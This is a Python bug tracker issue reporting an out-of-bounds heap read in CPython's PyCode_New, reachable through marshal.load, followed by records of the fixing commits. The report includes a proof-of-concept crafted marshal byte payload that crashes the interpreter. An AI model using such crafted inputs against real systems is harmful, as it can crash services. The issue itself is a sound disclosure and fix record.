➜
This issue trackerhas been migrated toGitHub, and is currentlyread-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.
Created on2015-07-12 17:46 byblarsen, last changed2022-04-11 14:58 byadmin. This issue is nowclosed.
| Files | ||||
|---|---|---|---|---|
| File name | Uploaded | Description | Edit | |
| invalid_read.py | blarsen,2015-07-12 17:46 | POC as Python 3.4 script | ||
| Pull Requests | |||
|---|---|---|---|
| URL | Status | Linked | Edit |
| PR 8283 | merged | serhiy.storchaka,2018-07-14 11:05 | |
| PR 8291 | merged | miss-islington,2018-07-16 06:11 | |
| PR 8311 | merged | serhiy.storchaka,2018-07-17 06:42 | |
| Messages (4) | |||
|---|---|---|---|
| msg246658 -(view) | Author: Brad Larsen (blarsen)* | Date: 2015-07-12 17:46 | |
`PyCode_New` can read invalid heap memory.FileObjects/codeobject.c: PyCodeObject * PyCode_New(int argcount, int kwonlyargcount, int nlocals, int stacksize, int flags, PyObject *code, PyObject *consts, PyObject *names, PyObject *varnames, PyObject *freevars, PyObject *cellvars, PyObject *filename, PyObject *name, int firstlineno, PyObject *lnotab) { PyCodeObject *co; unsigned char *cell2arg = NULL; Py_ssize_t i, n_cellvars; // ... n_cellvars = PyTuple_GET_SIZE(cellvars); // ... /* Create mapping between cells and arguments if needed. */ if (n_cellvars) { Py_ssize_t total_args = argcount + kwonlyargcount + ((flags & CO_VARARGS) != 0) + ((flags & CO_VARKEYWORDS) != 0); // *** 1 *** // ... /* Find cells which are also arguments. */ for (i = 0; i < n_cellvars; i++) { Py_ssize_t j; PyObject *cell = PyTuple_GET_ITEM(cellvars, i); for (j = 0; j < total_args; j++) { PyObject *arg = PyTuple_GET_ITEM(varnames, j); // *** 2 *** if (!PyUnicode_Compare(cell, arg)) { // *** 3 *** cell2arg[i] = j; used_cell2arg = 1; break; } } } // ... } // ... }1. `total_args` is determined from parameters that are user-controlled (see `r_object` in `Python/marshal.c`, in the `TYPE_CODE` case, lines 1265--1277).2. the `varnames` tuple is indexed with a value in the range [0, total_args), which could be larger than the range of valid indexes for `varnames`.3. `arg` is now a bogus PyObject value, and causes a segfault in `PyUnicode_Compare`.Environment: $ python3.4 --version Python 3.4.2 $ uname -a Linux debian-8-amd64 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) x86_64 GNU/LinuxPOC: from marshal import load from io import BytesIO payload = b'\xe3\x01\x00\xff\x00\x00\x00\x00\xfc\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\n\x00\x00\x00k\x00\x00|\x00\x00\x83\x01\x00S)\x01N)\x01\xda\x03foo)\x01\xda\x01x\xa9\x01\xda|x\xa9x\xa9\x00\xe3\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\n\x00\x00\x00t\x00\x00|\x00\x00\x83\x01\x00S)\x01N)\x01\xda\x03foo)\x01\xda\x01x\xa9\x00r\x03\x00\x00\x00\xfa\x0fmk_tesTgases.py\xda\x08<lambda>\x01\x00\x00\x00s\x00\x00\x00\x00r\x03\x00\x00\x00\xfa\x0fmk_testck_te\x00)\x01\xda\x01x\xa9x\xa9\x00\xe3\x01\x00\x00\x00\x00\x00\x80\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\n\x00\x00\x00t\x00\x00"\x00\x00\x83\x01\x00S)\x01N)\x01\xda\x03foo)\x01\xda\x01x\xa9\x00r\x03\x00\x00\x00\xfa\x0fmk_tMstgases\x11py\xda\x08<lambda>$\x00\x00\x12s\x00\x00\x00\x00r\x03\x00' load(BytesIO(payload)) | |||
| msg321710 -(view) | Author: Serhiy Storchaka (serhiy.storchaka)* | Date: 2018-07-16 06:10 | |
New changesetbd47384e07bde38a8f18b90b4cea02a505d95c75 by Serhiy Storchaka in branch 'master':bpo-24618: Add a check in the code constructor. (GH-8283)https://github.com/python/cpython/commit/bd47384e07bde38a8f18b90b4cea02a505d95c75 | |||
| msg321713 -(view) | Author: miss-islington (miss-islington) | Date: 2018-07-16 07:09 | |
New changeset5594f1dfbe214151b75405be042e9420a3649241 by Miss Islington (bot) in branch '3.7':bpo-24618: Add a check in the code constructor. (GH-8283)https://github.com/python/cpython/commit/5594f1dfbe214151b75405be042e9420a3649241 | |||
| msg321802 -(view) | Author: Serhiy Storchaka (serhiy.storchaka)* | Date: 2018-07-17 07:33 | |
New changesetcf30d5c5b88276a9af863438839ba386b9723a14 by Serhiy Storchaka in branch '3.6':bpo-24618: Add a check in the code constructor. (GH-8283) (GH-8311)https://github.com/python/cpython/commit/cf30d5c5b88276a9af863438839ba386b9723a14 | |||
| History | |||
|---|---|---|---|
| Date | User | Action | Args |
| 2022-04-11 14:58:18 | admin | set | github: 68806 |
| 2018-07-17 07:49:27 | serhiy.storchaka | set | status: open -> closed stage: patch review -> resolved resolution: fixed versions: + Python 3.6, Python 3.7, Python 3.8, - Python 3.4 |
| 2018-07-17 07:33:57 | serhiy.storchaka | set | messages: +msg321802 |
| 2018-07-17 06:42:45 | serhiy.storchaka | set | pull_requests: +pull_request7846 |
| 2018-07-16 07:09:47 | miss-islington | set | nosy: +miss-islington messages: +msg321713 |
| 2018-07-16 06:11:54 | miss-islington | set | pull_requests: +pull_request7825 |
| 2018-07-16 06:10:23 | serhiy.storchaka | set | messages: +msg321710 |
| 2018-07-14 11:05:22 | serhiy.storchaka | set | keywords: +patch stage: patch review pull_requests: +pull_request7817 |
| 2015-07-12 18:17:08 | serhiy.storchaka | set | nosy: +serhiy.storchaka |
| 2015-07-12 17:46:46 | blarsen | create | |